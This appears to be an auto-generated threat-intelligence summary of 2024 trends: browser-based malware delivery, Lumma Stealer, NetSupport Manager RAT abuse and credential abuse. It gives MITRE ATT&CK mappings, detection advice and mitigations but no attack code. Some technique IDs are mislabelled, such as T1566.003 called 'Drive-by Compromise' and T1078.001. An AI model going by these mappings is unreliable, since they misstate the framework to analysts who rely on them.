Full Report
Browser-based cyber-threats surged in 2024, with credential abuse and infostealers on the rise
Analysis Summary
# Tool/Technique: Browser-Based Cyber-Threats (General Trend)
## Overview
This summary covers a significant shift observed in 2024 where browser-based delivery mechanisms (like drive-by downloads and malicious advertisements) have surged in prevalence, while traditional email-delivered malware has declined. This trend is driven by actors seeking to bypass conventional email security filters.
## Technical Details
- Type: Trend/Technique Dominance
- Platform: Web Browsers (Implied)
- Capabilities: Delivering malware payloads, exploiting browser vulnerabilities, facilitating social engineering.
- First Seen: Observed significant surge throughout 2024 (per eSentire TRU report).
## MITRE ATT&CK Mapping
Since this is a high-level observation of delivery trends rather than a single specific tool, primary mappings relate to initial access via web vectors:
- **TA0001 - Initial Access**
- T1189 - Drive-by Compromise
- T1566 - Phishing
- T1566.003 - Drive-by Compromise (Often correlated with web advertising)
## Functionality
### Core Capabilities
- **Malware Delivery via Web:** Responsibility for 70% of observed malware cases in 2024.
- **Bypassing Email Filters:** Use of non-email vectors (browsers, ads) to circumvent traditional security layers.
### Advanced Features
- Adoption of novel social engineering techniques delivered via digital means, such as "ClickFix" (a CAPTCHA deception technique) and QR code phishing.
## Indicators of Compromise
*No specific IOCs for browser-based attacks aggregated—only associated malware mentioned.*
- **Associated Malware Families (Delivered via these vectors):** Lumma Stealer, NetSupport Manager RAT.
- **Behavioral Indicators:** User interaction with malicious advertisements, automatic execution following drive-by downloads, execution initiated by deceptive CAPTCHA prompts ("ClickFix").
## Associated Threat Actors
- Cybercriminals generally leveraging evolving web delivery methods.
- Actors utilizing compromised infrastructure (e.g., YouTube channels mentioned in related articles) to distribute infostealers.
## Detection Methods
- **Behavioral detection:** Monitoring for unusual processes spawned following web browsing activity or advertisement interaction.
- **24/7 Threat Detection:** Recommended by TRU.
- **EDR Solutions:** Essential for detecting anomalous endpoint activity stemming from browser exploitation.
## Mitigation Strategies
- Implementation of Endpoint Detection and Response (EDR) solutions.
- Adoption of phishing-resistant Multi-Factor Authentication (MFA).
- Regular security awareness training focused on social engineering tactics like QR code phishing and deceptive web prompts.
## Related Tools/Techniques
- QR Code Phishing (Quishing)
- Drive-by Downloads
- Malicious Advertisements (Malvertising)
- "ClickFix" Deceptive CAPTCHA technique
- Credential Theft via Compromised Personal Devices/Supply Chain access.
***
# Tool/Technique: Lumma Stealer
## Overview
Lumma Stealer is an information-stealing malware family whose proliferation was noted as being fueled by the shift towards browser-based delivery methods. Its primary function is to harvest sensitive data from infected systems.
## Technical Details
- Type: Malware Family (Infostealer)
- Platform: Likely Windows (Standard for most modern infostealers)
- Capabilities: Information theft, harvesting credentials, session cookies, and potentially cryptocurrency wallet data.
- First Seen: Not specified, but noted as seeing a 31% increase in incidents year-on-year in 2024.
## MITRE ATT&CK Mapping
Focuses on collection and exfiltration stages typical of infostealers:
- **TA0009 - Collection**
- T1555 - Credentials from Password Stores
- T1555.003 - Credentials from Web Browsers
- **TA0010 - Exfiltration**
## Functionality
### Core Capabilities
- Stealing credentials and sensitive information stored on compromised endpoints.
- Delivery via surging browser-based attacks (drive-by downloads, malvertising).
### Advanced Features
- Significant year-on-year incident increase suggests active development and effective distribution channels.
## Indicators of Compromise
- *No specific IOCs provided in the context.*
- **Behavioral Indicators:** Attempted access and compilation of browser profiles, wallet data, and stored password caches.
## Associated Threat Actors
- Not explicitly named, but are actors leveraging modern browser-based delivery mechanisms and social engineering.
## Detection Methods
- **Behavioral detection:** Monitoring for processes attempting to read sensitive files associated with browser data stores or credential managers.
- Signature-based detection on known Lumma Stealer payloads.
## Mitigation Strategies
- Strong endpoint security (EDR) capable of detecting file system access related to credential harvesting.
- User education regarding suspicious advertisements or websites leading to drive-by downloads.
## Related Tools/Techniques
- NetSupport Manager RAT (Other malware delivered via similar browser vectors)
- General Infostealers
***
# Tool/Technique: NetSupport Manager RAT
## Overview
NetSupport Manager is a legitimate remote administration tool that is frequently abused by threat actors to maintain remote access to compromised systems, often delivered via the newly favored browser-based attack vectors.
## Technical Details
- Type: Potentially Unwanted Program (PUP) / Abused Legitimate Tool
- Platform: Not specified, but generally Windows/Enterprise environments.
- Capabilities: Remote control, monitoring, and file transfer capabilities used for persistence and command and control (C2).
- First Seen: N/A (Legitimate tool with a history of abuse).
## MITRE ATT&CK Mapping
Focuses on command and control and remote access:
- **TA0011 - Command and Control**
- T1071 - Application Layer Protocol (If C2 traffic mimics legitimate traffic)
- **TA0005 - Defense Evasion**
## Functionality
### Core Capabilities
- Establishing persistence and remote access on victim machines.
- Facilitating hands-on-keyboard activity for established breaches.
### Advanced Features
- Use as a secondary payload following initial access via browser exploits.
## Indicators of Compromise
- *No specific IOCs provided in the context.*
- **Behavioral Indicators:** Unusual outbound network connections associated with remote administration ports or known legitimate NetSupport Manager C2 patterns.
## Associated Threat Actors
- Threat actors substituting traditional malware delivery with browser-based vectors for RAT deployment.
## Detection Methods
- Application whitelisting or strict inventory controls to prevent the execution of unauthorized remote access tools.
- Network monitoring for established C2 command structures used by the RAT.
## Mitigation Strategies
- Strict control over the deployment and execution of remote administration software.
- Network segmentation to limit the damage of a compromised endpoint using an RAT.
## Related Tools/Techniques
- Unauthorized use of legitimate remote access tools.
***
# Technique: Credential Abuse / Compromised Credentials
## Overview
Credential abuse emerged as the most common initial access vector in 2024. This technique relies on threat actors obtaining valid credentials (often cheaply available on fraud marketplaces) to directly infiltrate corporate environments, bypassing many traditional malware delivery defenses.
## Technical Details
- Type: Technique / Initial Access Vector
- Platform: All (Relies on harvested credentials for OS/Application login)
- Capabilities: Direct login to corporate resources, email, and systems without needing to execute malware on the endpoint first.
- First Seen: Significant uptick noted in 2024.
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1078 - Valid Accounts
- T1078.003 - Local Accounts
- T1078.004 - Cloud Accounts
- T1078.001 - Local or Domain Accounts
## Functionality
### Core Capabilities
- Use of credentials costing as little as $10 to gain initial entry.
- Infiltration traced to contractor devices compromised by infostealers, highlighting a supply chain risk.
### Advanced Features
- Exploiting the effectiveness of compromised credentials as a "trusted" entry point that often bypasses gateway security focusing on file-based threats.
## Indicators of Compromise
- **Behavioral Indicators:** Logins from geographically unusual locations, usage of known compromised accounts, anomalous user activity following login from third-party/contractor accounts.
## Associated Threat Actors
- Cybercriminals purchasing stolen data from fraud marketplaces.
- Actors targeting supply chain access via vendor/contractor accounts.
## Detection Methods
- **Behavioral detection:** Anomaly detection on user logins and entitlement checks.
- Implementation of **Phishing-Resistant MFA** as the key defense against stolen credentials.
## Mitigation Strategies
- Mandatory **Phishing-Resistant MFA** implementation across all accounts.
- Rigorous monitoring of initial access events, especially those originating from third-party or contractor connections.
- Strong patch management for endpoints used by vendors/contractors (since these devices might harbor infostealers).
## Related Tools/Techniques
- Phishing (The primary method for initially harvesting the credentials later abused).